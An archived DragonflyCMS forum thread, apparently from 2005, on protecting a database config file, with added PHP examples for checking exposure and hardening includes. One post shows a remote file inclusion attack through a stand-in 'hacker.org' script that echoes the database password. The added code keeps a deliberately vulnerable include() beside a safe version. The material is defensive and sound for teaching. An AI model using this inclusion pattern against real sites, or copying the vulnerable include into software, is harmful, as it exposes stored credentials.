

Database config file security (not strictly a CPG question) :: Archived
Post any security related questions in here.
Please send discovered reports to security @ cpgnuke.com
Do Not post links to exploits or hacker sites - your post will be edited/deleted.
If you think you've been hacked, FIRST go through your server logs.

macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Mon Apr 18, 2005 9:09 pm
Post subject: Database config file security (not strictly a CPG question)

[Yes, I admit it, this is not strictly a CPG/Dragonfly question but does impact indirectly on the security of my Dragonfly installation so I hope I'll be forgiven!]

In a nutshell, I need to install another app which accesses the same db as Dragonfly and I want to do what I can to make sure that it doesn't compromise the overall security of the current set up. Specifically I could do with some guidance as to what directory permissions and .htaccess contents I should use to protect the db config file for this new app.

If my current Dragonfly installation directory is

/public_html/

then the installation directory for the new app would be

/public_html/newapp

and the config file

/public_html/newapp/config.php

Advice on permissions for the file, the directory and the .htaccess file would be very much appreciated. Alternatively if someone can point me to a relevant resource instead that would also be great, thank you.

Mac


macavity's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
FreeBSD/Apache 2.0/MySQL 5.0.77/PHP 5.2.10/Dragonfly 9.2.1
run0 (Supporter, joined Jun 28, 2004, 1559 posts)
Posted: Mon Apr 18, 2005 9:47 pm
Post subject: Re: Database config file security (not strictly a CPG question)

How would it use the same DB as Dragonfly? It depends on what the app is, for permissions; you should go to the app's website for help.


run0's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Linux/1.3.33 (Unix)/4.0.22-standard/4.3.9/DF 9.x
macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Mon Apr 18, 2005 10:27 pm
Post subject: Re: Database config file security (not strictly a CPG question)

Er...OK, so there's no generic advice which might apply to situations like this? i.e. a bare minimum of entries for the .htaccess file etc.? (I'm not suggesting that's the case, just double checking)

Thanks for your reply.

Cheers,

Mac


pcsmith_uk (Newbie, joined Feb 04, 2005, 22 posts, location: uk)
Posted: Mon Apr 18, 2005 10:34 pm
Post subject: Re: Database config file security (not strictly a CPG question)

Why not keep your config file somewhere else on your filesystem (i.e. not public_html). Then just refer to it with the full path.

Alternatively, have a master config.php somewhere and create symlinks to it whenever you need to.

Usually though, apps have very different config.php files, unless you've specifically programmed it to use the same variable names.


pcsmith_uk's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
RHEL3/1.3.34/4.1.19/5.0.5/DF9.0.6.1
macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Mon Apr 18, 2005 10:47 pm
Post subject: Re: Database config file security (not strictly a CPG question)

I'm sorry, I must be a little slow this evening, I'm not sure how that relates to my question? Thanks anyway.

Mac


DJ Maze (Developer, joined Apr 19, 2004, 5683 posts, location: http://tinyurl.com/5z8dmv)
Posted: Tue Apr 19, 2005 12:14 pm
Post subject: Re: Database config file security (not strictly a CPG question)

We can't guarantee and do not know the security of that other script.
So we can't tell you what you must do.

Dragonfly security is dragonfly only so if that other script connects to the same database then the other script must be secure enough that someone can't access the Dragonfly CMS tables.

Also moving config.php outside the public_html is a useless action and doesn't improve security.

.htaccess doesn't have to be modified either unless that other script asks for it.
Then it still isn't a problem because the other script's .htaccess goes into the sub-directory.


DJ Maze's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Fedora 15 / 2.2.22 / 5.5.20 / 5.3.10 / CVS
macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Tue Apr 19, 2005 12:40 pm
Post subject: Re: Database config file security (not strictly a CPG question)

Thanks for the reply but I'm afraid I may have somehow misrepresented the question I was trying to ask. I was simply looking for some guidance on what I should do to protect a file which includes a db name, username and password (regardless of whether this is the file used by Dragonfly, this app or any other). My apologies for the confusion. My fear is that somehow the config file used by this 3rd party app might be accessible in some way which would allow its contents to be read (and thus allow access to the db used by both the app and Dragonfly). This is a separate config file in a separate directory with its own .htaccess file.

No problem though, thanks all for taking the time to reply.

Cheers,

Mac


pcsmith_uk (Newbie, joined Feb 04, 2005, 22 posts, location: uk)
Posted: Tue Apr 19, 2005 9:42 pm
Post subject: Re: Database config file security (not strictly a CPG question)

A .htaccess file isn't going to make any difference whatsoever.

What you've effectively asked, if you pardon my real-world example, is - If I had a door in my house, will anyone other than me open it?

You can never ever guarantee security, all you do is do your best to prevent unwanted eyes from seeing sensitive files.


macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Tue Apr 19, 2005 9:54 pm
Post subject: Re: Database config file security (not strictly a CPG question)

OK, I think I'm out of my depth here. I see from the Dragonfly .htaccess file the following and thought I might want to use something similar for the other (3rd party app) config file:

Quote::
# disable access to config.php and .ht* from a browser
<FilesMatch "^(config\.php|\.ht)">
Deny from all
</FilesMatch>

Regarding preventing others from seeing sensitive files that's exactly what I was trying to ask (i.e. how can I best do that for this file?), and how I should have phrased it originally!

Cheers,

Mac


pcsmith_uk (Newbie, joined Feb 04, 2005, 22 posts, location: uk)
Posted: Tue Apr 19, 2005 10:19 pm
Post subject: Re: Database config file security (not strictly a CPG question)

According to Netcraft your host is pretty well up to date on patches: Apache/1.3.33 (Unix) mod_throttle/3.1.2 PHP/4.3.11 mod_ssl/2.8.22 OpenSSL/0.9.7a

If Apache is configured properly there should be no reason at all to fiddle about denying access to PHP scripts as it should handle requests for them in the appropriate manner.


macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Tue Apr 19, 2005 10:33 pm
Post subject: Re: Database config file security (not strictly a CPG question)

Understood, that's good news. Thanks!

Mac


pcsmith_uk (Newbie, joined Feb 04, 2005, 22 posts, location: uk)
Posted: Tue Apr 19, 2005 10:52 pm
Post subject: Re: Database config file security (not strictly a CPG question)

There's a whole host of things you can do to check in case of security paranoia (which I think everyone suffers from every now and again).

A very simple browser check:

view-source:www.yourhost.com/newapp/config.php

Or from shell:

wget www.yourhost.com/newapp/config.php

Of course these are the simplest tests on earth but they're always worth checking. I'm sure your host will have set up Apache properly to handle .php extensions.


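The browser and wget checks above are the right idea. The script below, added here as an example and not code from DragonflyCMS or from anyone in this thread, turns them into a pass/fail test you can run from the command line against the new app's config file URL. It needs PHP 7.1 or later on the machine you run it from; the URL, the credential variable names it looks for and the exit codes are assumptions. A response counts as a leak if it contains a PHP opening tag or an assignment to one of those variables; an empty 200 body (the script executed and printed nothing) and a 403 (the .htaccess Deny quoted earlier) both count as OK.

```php
<?php
// check_config_exposure.php: added example, not DragonflyCMS code.
// Fetches a URL and reports whether the server handed back raw PHP source
// (and therefore the database credentials) instead of executing the script.
// The credential variable names below are assumptions; adjust to your config.
declare(strict_types=1);

/**
 * True when $body looks like unprocessed PHP source: an opening PHP tag, or
 * an assignment to one of the variable names a DB config file typically uses.
 */
function looksLikePhpSource(
    string $body,
    array $secretVars = ['db_password', 'dbpassword', 'dbpass', 'dbuser']
): bool {
    if (preg_match('/<\?(php\b|=)/i', $body) === 1) {
        return true;
    }
    foreach ($secretVars as $var) {
        if (preg_match('/\$' . preg_quote($var, '/') . '\s*=/', $body) === 1) {
            return true;
        }
    }
    return false;
}

/** Fetch $url; returns [status, body]. ignore_errors keeps 403/404 bodies. */
function fetchBody(string $url): array
{
    $ctx = stream_context_create(['http' => ['ignore_errors' => true, 'timeout' => 10]]);
    $body = @file_get_contents($url, false, $ctx);
    $status = 0;
    // $http_response_header is populated in this scope by file_get_contents().
    if (isset($http_response_header[0])
        && preg_match('#^HTTP/\S+\s+(\d{3})#', $http_response_header[0], $m)) {
        $status = (int) $m[1];
    }
    return [$status, $body === false ? '' : $body];
}

if (PHP_SAPI === 'cli' && isset($argv[1])) {
    [$status, $body] = fetchBody($argv[1]);
    if ($status === 0) {
        fwrite(STDERR, "ERROR: no HTTP response from $argv[1]\n");
        exit(1);
    }
    if (looksLikePhpSource($body)) {
        fwrite(STDERR, "FAIL: $argv[1] returned PHP source (HTTP $status)\n");
        exit(2);
    }
    echo "OK: HTTP $status, " . strlen($body) . " bytes, no PHP source visible\n";
}
```

Run it as `php check_config_exposure.php http://www.yourhost.com/newapp/config.php`; a non-zero exit means look at the PHP handler configuration before anything else. Filesystem mode is a separate question from HTTP exposure: with mod_php the file has to be readable by the Apache user, and on a shared host that is the same user for every customer's scripts, so a mode such as 640 only isolates you when PHP runs as your own account (suexec, suPHP or a per-user FastCGI pool). On Apache 2.4 the quoted `Deny from all` is written `Require all denied` unless mod_access_compat is loaded.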
macavity (Heavy poster, joined Jun 23, 2004, 199 posts)
Posted: Tue Apr 19, 2005 11:10 pm
Post subject: Re: Database config file security (not strictly a CPG question)

Thanks for that! I'd rather check simple things than just assume they're OK too.

Cheers,

Mac

Jeruvy (Security Team, joined Apr 23, 2004, 1432 posts, location: Canada)
Posted: Tue Apr 19, 2005 11:24 pm
Post subject: Re: Database config file security (not strictly a CPG question)

All I can add to this already confusing topic is make sure you are running a current version of mod_security on your apache server.

HTH,

_________________
J.
j e r u v y a t y a h o o d o t c o m

Need help? Look here: www.dragonflycms.org/W...d=112.html
Need to chat? Look for me on irc.freenode.net

Jeruvy's server specs (Server OS / Apache / MySQL / PHP / DragonflyCMS)
Ubuntu7.10/Debian3.1 - 2.2.3/1.3.37 - 5.0.38/4.0.27 - 5.2.1/4.4.7 - CVS/9.1.2}
DJ Maze (Developer, joined Apr 19, 2004, 5683 posts, location: http://tinyurl.com/5z8dmv)
Posted: Wed Apr 20, 2005 12:25 am
Post subject: Re: Database config file security (not strictly a CPG question)

OK, I will tell some info about secure files.
There are several ways to secure a file:

1) Deny access through .htaccess (Apache only)
2) Put the data in a server-side script (cgi, php, asp, etc.)
3) Don't put it on the server

Since #1 is Apache only and #3 is not what you want, neither of them is the best solution, so the best way is #2.

If the server handles .php files (in other words, the PHP is "processed" and you don't see it like a .txt file) then we can use such a file.
PHP:
<?php
// This data isn't echoed unless we want it to be.
$db_password = "13456";

echo $db_password; // BAD IDEA
?>

However this doesn't protect against overwrite.
PHP:
<?php
include('config.php');
$db_password = "456789"; // overwrite
?>

This doesn't do much: it overwrites and probably denies access. But we do find an issue and that's called XSS (Cross Serverside Scripting).

For example your code isn't properly coded and does
PHP:
include("$name.php");

$name isn't checked AND register_globals is on/used (like in CPG-Nuke 8.x) AND allow_url_fopen is on in php.ini (default).
Then a URL like "mydomain.com/index.php?name=http://hacker.org/script" will open the exploit:
PHP:
$name = 'http://hacker.org/script';
include("$name.php");

The script.php contains
PHP:
include('config.php');
echo $db_password;

Then it knows your DB password.
Most people don't think about creating a separate DB user in the cPanel -> MySQL admin; they just use their FTP/cPanel login details.
This results in an immediately "owned" server and they can do whatever they want with the server.
So to prevent this from happening it's best you create a DB user and "hook" that user to your database, then set up config.php to use this user:
PHP:
$dbuser = 'mydomain_user';
$dbpassword = '!dbP@ssw0rd';

This way they only have access to the webspace (through PHP) and the database (that's why daily backups are important).

However some people are more skilled and could destroy the complete server if they want to.

I hope this explains that config.php isn't really a security issue but the complete script system itself is your main concern. Also your own skill to create a separate DB login is the issue.


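What the post above describes with `include("$name.php")` is remote file inclusion (and, with a value like `?name=../../config`, local file inclusion through path traversal); it is not what is normally called XSS. The code below is an example added for this page, not DragonflyCMS code and not the third-party app's: the module names, the modules/ directory, the database name and the account name are assumptions. It puts the vulnerable include beside an allowlisted version and adds a config.php that connects with a dedicated database account as the post recommends. Two things have changed since 2005 and are assumed here: PHP 5.2 added allow_url_include (default off), which is what now gates include() of URLs separately from allow_url_fopen, and register_globals was removed in PHP 5.4, so the request value has to be read from $_GET explicitly. Note that the allowlist also blocks the local variant, which no php.ini URL setting does.

```php
<?php
// Added example for this thread, not DragonflyCMS code: the include() flaw
// DJ Maze describes next to a hardened version, plus a config.php that uses a
// dedicated, least-privilege database account. ALLOWED_MODULES, the modules/
// directory, DB_NAME and DB_USER are illustrative assumptions.
declare(strict_types=1);

// ---- VULNERABLE: what the post warns about ---------------------------------
// $name comes straight from the request. With allow_url_include=On (on PHP
// before 5.2, allow_url_fopen=On was enough), ?name=http://hacker.org/script
// makes PHP download and execute hacker.org/script.php, which can include
// config.php and echo the credentials. With URL includes off, values such as
// ../../config still pull in local files.
function loadModuleVulnerable(string $name): void
{
    include("$name.php"); // DO NOT USE: attacker-controlled path
}

// ---- HARDENED: allowlist the name, build the path yourself -----------------
const ALLOWED_MODULES = ['news', 'forums', 'search'];

/** Map a request value to a file path, or null if it is not an allowed module. */
function resolveModule(string $name, string $baseDir): ?string
{
    // Strict comparison against fixed names: no URLs, no "../", no null bytes.
    if (!in_array($name, ALLOWED_MODULES, true)) {
        return null;
    }
    return $baseDir . DIRECTORY_SEPARATOR . $name . '.php';
}

function loadModuleSafe(string $name): void
{
    $path = resolveModule($name, __DIR__ . '/modules');
    if ($path === null || !is_file($path)) {
        http_response_code(404);
        exit('Unknown module'); // do not echo $name back: it is attacker input
    }
    include $path;
}

// ---- config.php: credentials of a dedicated, least-privilege account --------
// Nothing here is echoed. The account has SELECT/INSERT/UPDATE/DELETE on this
// one database only, so a leak does not also hand over FTP/cPanel or other
// databases (the "owned server" case in the post).
const DB_HOST = 'localhost';
const DB_NAME = 'mydomain_db';     // assumption
const DB_USER = 'mydomain_user';   // name taken from the post
const DB_PASS = '!dbP@ssw0rd';     // value from the post; use your own

function dbConnect(): mysqli
{
    // Throw on failure so the handling below works on PHP 5.3 through 8.x.
    mysqli_report(MYSQLI_REPORT_ERROR | MYSQLI_REPORT_STRICT);
    try {
        return new mysqli(DB_HOST, DB_USER, DB_PASS, DB_NAME);
    } catch (mysqli_sql_exception $e) {
        error_log('DB connect failed: ' . $e->getMessage()); // log it, never print it
        exit('Service unavailable');
    }
}

// ---- Request handling (register_globals is gone since PHP 5.4) -------------
// Assumption: the front controller takes the module name from ?name=
loadModuleSafe((string) ($_GET['name'] ?? 'news'));
```

Create the account with `CREATE USER 'mydomain_user'@'localhost' IDENTIFIED BY '...';` followed by `GRANT SELECT, INSERT, UPDATE, DELETE ON mydomain_db.* TO 'mydomain_user'@'localhost';` (on MySQL 5.x the single form `GRANT ... IDENTIFIED BY` does both). No DROP, FILE, GRANT OPTION and no access to other schemas. Because the new app shares the Dragonfly database, a leaked credential still reaches the Dragonfly tables in that schema, which is the point the developer makes above about the third-party script having to be trustworthy; the separate account limits the damage to that one database rather than the whole hosting account.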
Page 1 of 2
All times are GMT

All content of this website is copyrighted by the Creative Commons NC-SA